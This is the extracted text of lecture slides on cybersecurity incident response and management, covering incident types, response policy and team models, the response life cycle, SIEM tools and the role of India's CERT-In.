UNIT -VII: Incident Response

and Management
What is an incident?
 Event
◦ An observable occurrence on a system or network.
 Adverse event
◦ An event with negative consequences.
 Computer security incident
◦ Any unlawful, unauthorized or unacceptable action that involves a
computer system or a computer network.
◦ Violation or imminent threat to computer security policies, acceptable
use policies, or standard security practices.
Examples of Incidents
 Malicious code
◦ Viruses, worms, logic bombs, Trojans
 Denial of Service
◦ Overwhelming network services with tidal waves of packets.
 Unauthorized access
◦ Accessing information or systems which a user is not authorized to
use.
 Inappropriate usage
◦ Browsing for porn on lunch hour.
◦ Installing and using peer-to-peer (P2P) applications for file sharing.
◦ Install a Wi-Fi router to bypass company monitoring
Needs for Incident Response
• Attacks frequently compromise personal and business data,
• it is critical to respond quickly and effectively when security breaches occur.
• The concept of computer security incident response has become
widely accepted and implemented.
• One of the benefits of having an incident response capability is that
• it supports responding to incidents systematically
• i.e., following a consistent incident handling methodology
• so that the appropriate actions are taken.

4
What is Incident Response (IR)?
• Incident Response (IR) is a structured approach to addressing and
managing security incidents, such as cyberattacks, data breaches, and
system failures.
• Key Objectives of Incident Response:
• Detect and identify security incidents.
• Contain the threat to prevent further damage.
• Eradicate the root cause of the incident.
• Recover and restore normal operations.
• Learn and improve from the incident.
Incident Response Policy, Plan, and
Procedure
Policy: An IRP is a formal document that outlines an organization's approach to
managing and responding to cybersecurity incidents.
Key element of Incident Response Policy:
 Statement of management commitment
 Purpose and objectives of the policy
 Scope of the policy (to whom and what it applies and under what circumstances)
 Definition of computer security incidents and related terms
 Organizational structure and definition of roles, responsibilities, and levels of authority
 Prioritization or severity ratings of incidents
 Performance measures
 Reporting and contact forms
Incident Response Policy, Plan, and Procedure, cont’d

Plan Elements:
• Organizations should have a formal, focused, and coordinated
approach to responding to incidents, including an incident response
plan that provides the roadmap for implementing the incident
response capability.

Procedure Elements:
• Procedures should be based on the incident response policy and plan.
• Standard operating procedures (SOPs) are a delineation of the specific
technical processes, techniques, checklists, and forms used by the
incident response team.
Sharing Information With Outside Parties
Incident Response Teams
• Central Incident Response Team
• Distributed Incident Response Teams
• Coordinating Team

9
Team Model Selection
• The Need for 24/7 Availability
• Full-Time Versus Part-Time Team Members
• Employee Morale
• Cost
• Staff Expertise

10
Incident Response Team Services
• Intrusion Detection
• Advisory Distribution
• Education and Awareness
• Information Sharing

11
Recommendations for Incident Handling
• Establish a formal incident response capability.
• Create an incident response policy, plan, and procedure
• Establish policies and procedures regarding incident-related information
sharing.
• Provide pertinent information on incidents to the appropriate organization.
• Consider the relevant factors when selecting an incident response team
model.
• Select people with appropriate skills for the incident response team
• Identify other groups within the organization
• Determine which services the team should offer

12
Handling an Incident: Incident Response Life
Cycle
• Incidence Response
requires many process,
considerations and
actions where
leadership and tactical
teams must work in a
focused manner to
maintain security.
Preparation
• Incidence response plan • Incidence response plan-Preventing
• Communication and facilities incidents
• Incident analysis hardware and software • Risk Assessments
• Incident analysis resources • Host Security
• Incident mitigation software • Network Security
• Roles/ Responsibilities • Malware Prevention
• SOPs • User Awareness and Training.
• Cyber Insurance/ Key Vendors
• Privacy Considerations
Detection and Analysis (Cyclical)
• Detection • Analysis
• SOC or MSSP • Profile Networks and Systems
• Attack Vectors • Understand Normal Behaviors
• Signs of Incident • Create a Log Retention Policy
• Solutions • Perform Event Correlation
• External Support • Keep All Host Clocks Synchronized
• Dissemination of information • Maintain and Use a Knowledge Base of
Information
• Sources of Precursors and Indicators
• Alerts • Use Internet Search Engines for
• Logs Research
• Publicly available information
• People
Containment, Eradication and Recovery
(Cyclical)
• Eradication and recovery
• Choosing a Containment Strategy
• Phased and prioritized
• Evidence Gathering and Handling • Eliminate components of the
• Identifying the Attacking Hosts incident
• Validating the Attacking Host’s IP
• Identifying and mitigating all
vulnerabilities
Address
• Restore systems to normal
• Researching the Attacking Host operation
• Using Incident Databases • Confirm that the systems are
• Monitoring Possible Attacker functioning normally
Communication Channels • Remediate vulnerabilities to
• Evidence Preservation prevent similar incidents
Post Incidents, Recovery
• Using Incident Data
• AAR’s
• Updating SOP’s and IR Plan
• Evidence Retention
• Privacy Considerations
• Reporting Obligations
Incident Response Methodology
• Pre-incident preparation
• Detection of incidents
• Initial response
• Formulate response strategy
• Investigate the incident
• Reporting
• Resolution (and Improvement)
Pre-Incident Preparation
• For the organization
• This is where pro-active measures can be implemented.
• For the Computer Security Incident Response Team (CSIRT)
• Hardware and software needs.
• Forms and checklists for documenting incidents.
• Staff training.
Who Is Involved?
• Human resource personnel, legal counsel, technical experts, security
professionals, corporate security officers, business managers, end
users, help desk workers, and other employees.
• Computer Security Incident Response Team (CSIRT)
• A dynamic team assembled when an organization requires its capabilities.
Detection of Incidents
• One of the most important aspects of incident response.
• Items which should be recorded:
• Current date and time
• Who/what reported the incident
• Nature of the incident
• When the incident occurred
• Hardware/software involved
• Points of contact for involved personnel
Initial Response

 Involves assembling the CSIRT, collecting network-based and other

data, determining the type of incident that has occurred, and
assessing the impact of the incident.
 Document steps that must be taken.
 Team must verify that an incident has actually occurred, which
systems are directly or indirectly affected, which users are involved,
and the potential business impact.
Formulate a Response Strategy
• Goal is to determine the most appropriate response strategy given the
circumstances of the incident.
• Factors to consider:
• How critical are the affected systems?
• How sensitive is the compromised or stolen information?
• Who are the potential perpetrators?
• Is the incident known to the public?
• What is the level of unauthorized access attained by the attacker?
• What is the apparent skill of the attacker?
• How much system and user downtime is involved?
• What is the overall dollar loss?
Taking Action
• Legal
• File a civil complaint and/or notify law enforcement.
• Administrative
• Usually has to deal with internal employees who have violated
workplace policies.
Investigating the Incident
 Data Collection
◦ Host-based information, network-based information, and other information.
◦ Collected from a live running system or one that is turned off.
◦ Must be collected in a forensically sound manner.
◦ Collect in a manner that protects its integrity (evidence handling).
 Forensic Analysis
◦ Reviewing items such as log files, system configuration files, items left behind on
a system, files modified, installed applications (possible hacker tools), etc.
◦ Could involve many types of tools and techniques.
◦ May lead to additional data collection.
Reporting
• Keys to making this phase successful:
• Document immediately.
• Write concisely and clearly. Don’t use shorthand.
• Use a standard format.
• Have someone else review to ensure accuracy and completeness.
Resolution
• Three steps:
• Contain the problem.
• Solve the problem.
• Take steps to prevent the problem from occurring again.
Incident Handling Checklist
Incident Response Coordination
Outcomes
 Better security mean reduced incidents.
 Be proactive to provide security services:
◦ Physical
◦ Network
◦ Workstation
◦ User training
 Be prepared
◦ Have a plan.
◦ An incident response plan is vital. It is the blueprint for
dealing with incidents.
◦ A well-executed response can uncover the true extent of a
compromise and prevent future occurrences.
Popular Incident Response Software
• In industry, it is usually called Security information and
event management (SIEM)
• ArcSight by Microfocus
• Information Security Office (ISO) is using this software
• Splunk by Splunk Inc.
• It has free trial version, so we will teach this software in this course
• Their functionalities and interface are very similar to each other

31
Indian Computer Emergency Response Team
(CERT-In)
• Established in 2004 under the Ministry of Electronics and Information
Technology (MeitY).
• National cybersecurity agency responsible for monitoring, preventing,
and responding to cyber threats.
• Provides early warnings, threat intelligence, and cybersecurity
guidelines.
• Conducts audits and awareness programs to improve cyber resilience.
Key Responsibilities and Core Services
• Key Responsibilities:
• Incident Response: Detecting, preventing, and mitigating cyber incidents.
• Threat Intelligence & Alerts: Issuing advisories on vulnerabilities and attacks.
• Security Guidelines: Providing best practices for IT security.
• Cybersecurity Training: Conducting workshops for professionals.
• Collaboration: Working with government, private sector, and international CERTs.
Core Services:
• Incident Handling & Digital Forensics
• Vulnerability Assessment & Penetration Testing (VAPT)
• Security Audits & Compliance Checks
• Malware & Threat Analysis
• Cybersecurity Drills & Simulations
Legal Framework
• Legal Framework:
• Operates under the IT Act, 2000 (amended in 2008).
• Mandates reporting of cyber incidents (as per IT Rules 2022).
• Issues security directives and compliance requirements.
• Investigates cyber threats and attacks.
• Example:
• 2022 Cybersecurity Directive: CERT-In issued mandatory reporting of cyber
incidents within six hours, impacting companies and service providers.
• Impact: Strengthened cybersecurity response, improved compliance, and
increased awareness.
UNIT-VIII: Data Leakage Prevention